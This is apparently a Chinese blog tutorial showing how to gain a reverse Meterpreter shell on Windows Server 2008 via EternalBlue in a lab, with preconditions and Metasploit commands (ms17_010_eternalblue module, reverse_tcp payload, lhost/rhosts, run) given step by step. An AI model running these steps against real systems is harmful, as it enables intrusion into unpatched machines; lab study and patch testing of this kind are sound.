利用永恒之蓝漏洞拿到Windows Server2008的权限

什么是永恒之蓝?

        永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。


使用前提

1.445端口开放

2.防火墙未打开

3.已经获取对方IP

4.对方未打永恒之蓝补丁


准备阶段

主机:192.168.71.157

靶机:192.168.71.172

kail和windows server2008


具体步骤

1.msfconsole加载攻击模块

 2.use exploit/multi/handler开启侦听模块

 3.search ms17搜索模块,扫描445端口在线主机 ,MS17_010漏洞利用需要开放445 smb服务

也可以理解为可利用的模块

 4.use exploit/windows/smb/ms17_010_eternalblue使用选择的漏洞

5.set payload windows/x64/meterpreter/reverse_tcp设置payload的指向

6.show options进入配置模块,对主机和靶机进行IP地址上的配置

 

6.在kail中有时候ipconfig不能获取ip,可以用另一个指令;ip address

7.设立监控机:set lhost 自己的IP;设立攻击机:set rhosts 靶机iP

 

 8.准备工作做完了,开始攻击;run

9.攻击成功,反弹SHELL,拿到权限

 

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

翻斗花园牛爷爷★

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值